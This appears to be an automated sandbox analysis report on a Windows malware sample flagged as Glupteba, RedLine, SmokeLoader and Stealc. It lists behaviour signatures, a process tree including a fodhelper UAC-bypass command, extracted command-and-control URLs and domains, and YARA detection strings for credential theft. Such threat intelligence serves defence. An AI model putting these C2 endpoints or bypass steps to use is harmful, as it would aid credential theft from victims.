Edit tour

Windows Analysis Report
16GAuqLUFK.exe

Overview

General Information

Sample name:	16GAuqLUFK.exe renamed because original name is a hash value
Original sample name:	fcd15e71512e00af86732fb04281cf03.exe
Analysis ID:	1366691
MD5:	fcd15e71512e00af86732fb04281cf03
SHA1:	b92a182397e196d9b4e1c2344d8d022f19cce009
SHA256:	7157ecb7914f8782239cc0160a3cd6ff622e204651d957ac7846b4ad7e7d4343
Tags:	exe
Infos:

Detection

Glupteba, RedLine, SmokeLoader, Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

UAC bypass detected (Fodhelper)

Yara detected Glupteba

Yara detected RedLine Stealer

Yara detected SmokeLoader

Yara detected Stealc

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Connects to many ports of the same IP (likely port scanning)

Contains functionality to inject code into remote processes

Contains functionality to steal Chrome passwords or cookies

Creates a thread in another existing process (thread injection)

Creates multiple autostart registry keys

Deletes itself after installation

Drops PE files with benign system names

Found Tor onion address

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Leaks process information

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

May use the Tor software to hide its network traffic

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

16GAuqLUFK.exe (PID: 3220 cmdline: C:\Users\user\Desktop\16GAuqLUFK.exe MD5: FCD15E71512E00AF86732FB04281CF03)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

820.exe (PID: 3140 cmdline: C:\Users\user\AppData\Local\Temp\820.exe MD5: EE1049D8F8248D11080582FE27F96843)

820.exe (PID: 1412 cmdline: C:\Users\user\AppData\Local\Temp\820.exe MD5: EE1049D8F8248D11080582FE27F96843)

16E6.exe (PID: 5340 cmdline: C:\Users\user\AppData\Local\Temp\16E6.exe MD5: 54B4A6C4422FD983F901A346072DC89F)

WerFault.exe (PID: 3220 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 716 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 4724 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 724 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 1288 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 780 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 6128 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 864 MD5: C31336C1EFC2CCB44B4326EA793040F2)

regsvr32.exe (PID: 3948 cmdline: regsvr32 /s C:\Users\user\AppData\Local\Temp\1C75.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

regsvr32.exe (PID: 3200 cmdline: /s C:\Users\user\AppData\Local\Temp\1C75.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

23F8.exe (PID: 1576 cmdline: C:\Users\user\AppData\Local\Temp\23F8.exe MD5: C34C5873CC37033CF7A75A400BB50B1A)

28CC.exe (PID: 3920 cmdline: C:\Users\user\AppData\Local\Temp\28CC.exe MD5: F94B2515B62B2EE2A9A07F2747C283EC)

3ABE.exe (PID: 6564 cmdline: C:\Users\user\AppData\Local\Temp\3ABE.exe MD5: 3954CC01C26D1962284F3B95602F2367)

288c47bbc1871b439df19ff4df68f076.exe (PID: 5136 cmdline: "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe" MD5: 1894F7AA0F57BEC640F13E2EC87840E1)

cmd.exe (PID: 1672 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

InstallSetup9.exe (PID: 6424 cmdline: "C:\Users\user\AppData\Local\Temp\InstallSetup9.exe" MD5: B244F23C876D3F9A81F2C2B395408E70)

InstallSetup9.exe (PID: 3524 cmdline: "C:\Users\user\AppData\Local\Temp\InstallSetup9.exe" MD5: B244F23C876D3F9A81F2C2B395408E70)

BroomSetup.exe (PID: 6204 cmdline: C:\Users\user\AppData\Local\Temp\BroomSetup.exe MD5: 00E93456AA5BCF9F60F84B0C0760A212)

nsn5FE8.tmp.exe (PID: 6424 cmdline: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe MD5: 14ECE4108FC25FE4D185C101714A25B3)

toolspub2.exe (PID: 2656 cmdline: "C:\Users\user\AppData\Local\Temp\toolspub2.exe" MD5: 85E39A9EF8C8F1BEEF408EFC12256FF4)

toolspub2.exe (PID: 3116 cmdline: "C:\Users\user\AppData\Local\Temp\toolspub2.exe" MD5: 85E39A9EF8C8F1BEEF408EFC12256FF4)

csrss.exe (PID: 3480 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: EE1049D8F8248D11080582FE27F96843)

csrss.exe (PID: 3692 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: EE1049D8F8248D11080582FE27F96843)

5AAB.exe (PID: 5836 cmdline: C:\Users\user\AppData\Local\Temp\5AAB.exe MD5: F2FD38A6DDDB5B6C67C9F6622AFBD47B)

WerFault.exe (PID: 6756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 360 MD5: C31336C1EFC2CCB44B4326EA793040F2)

6ED0.exe (PID: 5856 cmdline: C:\Users\user\AppData\Local\Temp\6ED0.exe MD5: 68514F27EE18239DBB1731E852DFF0C1)

explorer.exe (PID: 6480 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

eieeggj (PID: 2884 cmdline: C:\Users\user\AppData\Roaming\eieeggj MD5: FCD15E71512E00AF86732FB04281CF03)

svchost.exe (PID: 6428 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 6640 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5340 -ip 5340 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 6096 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5340 -ip 5340 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 1876 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5340 -ip 5340 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 4164 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5340 -ip 5340 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 5760 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5836 -ip 5836 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 5152 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 2292 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Glupteba	Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.	No Attribution	http://resources.infosecinstitute.com/tdss4-part-1/ https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/ https://blog.google/technology/safety-security/new-action-combat-cyber-crime/ https://blog.google/threat-analysis-group/disrupting-glupteba-operation/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/	https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Stealc/stealc_config_extractor.ipynb https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Stealc/stealc_string_decryption.py	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://77.91.76.36/3886d2276f6914c4.php"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://snukerukeutit.org/", "http://lightseinsteniki.org/", "http://tyiuiunuewqy.org/", "http://liuliuoumumy.org/", "http://tonimiuyaytre.org/"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\28CC.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\28CC.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\28CC.exe	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xc3c8d:$s14: keybd_event 0xcab80:$v1_1: grabber@ 0xc4812:$v1_2: <BrowserProfile>k__ 0xc5299:$v1_3: <SystemHardwares>k__ 0xc5358:$v1_5: <ScannedWallets>k__ 0xc53e8:$v1_6: <DicrFiles>k__ 0xc53c4:$v1_7: <MessageClientFiles>k__ 0xc578e:$v1_8: <ScanBrowsers>k__BackingField 0xc57e0:$v1_8: <ScanWallets>k__BackingField 0xc57fd:$v1_8: <ScanScreen>k__BackingField 0xc5837:$v1_8: <ScanVPN>k__BackingField 0xb69a6:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xb61b2:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\BroomSetup.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\Users\user\AppData\Local\Temp\3ABE.exe	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x6bf141:$s1: Runner 0x6bf2a6:$s3: RunOnStartup 0x6bf155:$a1: Antis 0x6bf182:$a2: antiVM 0x6bf189:$a3: antiSandbox 0x6bf195:$a4: antiDebug 0x6bf19f:$a5: antiEmulator 0x6bf1ac:$a6: enablePersistence 0x6bf1be:$a7: enableFakeError 0x6bf2cf:$a8: DetectVirtualMachine 0x6bf2f4:$a9: DetectSandboxie 0x6bf31f:$a10: DetectDebugger 0x6bf32e:$a11: CheckEmulator

Memory Dumps

Source	Rule	Description	Author	Strings
0000001D.00000002.2507900128.00000000007DC000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x14b8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.2280019076.0000000001FB1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2280019076.0000000001FB1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000E.00000000.2389009297.0000000000D42000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000000.2389009297.0000000000D42000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x144efc:$string1: SELECT origin_url, username_value, password_value FROM logins 0x146c14:$string2: API call with %s database connection pointer 0x147768:$string3: os_win.c:%d: (%lu) %s(%s) - %s
00000021.00000002.2576715826.00000000005ED000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1258:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000026.00000002.3186242859.000000000080C000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1478:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000021.00000002.2576846964.0000000002070000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2042153672.00000000004D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000007.00000002.2704339035.0000000002309000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000020.00000002.2567378740.0000000001F61000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000020.00000002.2567378740.0000000001F61000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000003.2228963618.0000000000490000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000016.00000003.2459792248.0000000003C82000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000005.00000002.2342067283.00000000051FA000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000019.00000002.2506318498.0000000005600000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.2279751170.0000000000490000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2279751170.0000000000490000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000016.00000002.2603121419.0000000003393000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000021.00000003.2513498191.0000000002080000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000026.00000002.3186779959.00000000022C5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000016.00000002.2594659373.0000000002B4C000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2042498408.00000000020B1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2042498408.00000000020B1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000016.00000002.2581006895.0000000000843000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000026.00000003.2555550237.00000000007D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000004.00000002.2279733437.0000000000480000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000016.00000002.2603121419.0000000002F50000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.2279823208.00000000004BC000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1258:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001E.00000000.2501968948.0000000000401000.00000020.00000001.01000000.00000013.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000026.00000002.3185354932.0000000000400000.00000040.00000001.01000000.00000017.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2042178550.00000000004E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2042178550.00000000004E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000003.1978169987.00000000004E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000020.00000002.2566695195.0000000000510000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000020.00000002.2566695195.0000000000510000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.2042284755.000000000050D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1198:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000026.00000002.3185992517.00000000007B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000026.00000002.3185992517.00000000007B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x145cfc:$string1: SELECT origin_url, username_value, password_value FROM logins 0x147a14:$string2: API call with %s database connection pointer 0x148568:$string3: os_win.c:%d: (%lu) %s(%s) - %s
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
33.3.5AAB.exe.2080000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
33.2.5AAB.exe.2070e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
4.2.eieeggj.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
4.2.eieeggj.480e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.16GAuqLUFK.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0.2.16GAuqLUFK.exe.4d0e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
33.2.5AAB.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
7.2.16E6.exe.400000.0.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x144efc:$string1: SELECT origin_url, username_value, password_value FROM logins 0x146c14:$string2: API call with %s database connection pointer 0x147768:$string3: os_win.c:%d: (%lu) %s(%s) - %s
32.2.toolspub2.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
7.3.16E6.exe.2540000.0.raw.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x144efc:$string1: SELECT origin_url, username_value, password_value FROM logins 0x146c14:$string2: API call with %s database connection pointer 0x147768:$string3: os_win.c:%d: (%lu) %s(%s) - %s
7.3.16E6.exe.2540000.0.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x1440fc:$string1: SELECT origin_url, username_value, password_value FROM logins 0x145e14:$string2: API call with %s database connection pointer 0x146968:$string3: os_win.c:%d: (%lu) %s(%s) - %s
38.2.nsn5FE8.tmp.exe.7b0e67.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
4.3.eieeggj.490000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
38.2.nsn5FE8.tmp.exe.400000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
14.0.28CC.exe.d40000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.0.28CC.exe.d40000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.0.28CC.exe.d40000.0.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xc3c8d:$s14: keybd_event 0xcab80:$v1_1: grabber@ 0xc4812:$v1_2: <BrowserProfile>k__ 0xc5299:$v1_3: <SystemHardwares>k__ 0xc5358:$v1_5: <ScannedWallets>k__ 0xc53e8:$v1_6: <DicrFiles>k__ 0xc53c4:$v1_7: <MessageClientFiles>k__ 0xc578e:$v1_8: <ScanBrowsers>k__BackingField 0xc57e0:$v1_8: <ScanWallets>k__BackingField 0xc57fd:$v1_8: <ScanScreen>k__BackingField 0xc5837:$v1_8: <ScanVPN>k__BackingField 0xb69a6:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xb61b2:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
0.3.16GAuqLUFK.exe.4e0000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
38.2.nsn5FE8.tmp.exe.7b0e67.1.unpack	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x5b211:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
29.2.toolspub2.exe.5c15a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
7.2.16E6.exe.23d0e67.1.raw.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x144efc:$string1: SELECT origin_url, username_value, password_value FROM logins 0x146c14:$string2: API call with %s database connection pointer 0x147768:$string3: os_win.c:%d: (%lu) %s(%s) - %s
7.2.16E6.exe.400000.0.raw.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0x145cfc:$string1: SELECT origin_url, username_value, password_value FROM logins 0x147a14:$string2: API call with %s database connection pointer 0x148568:$string3: os_win.c:%d: (%lu) %s(%s) - %s
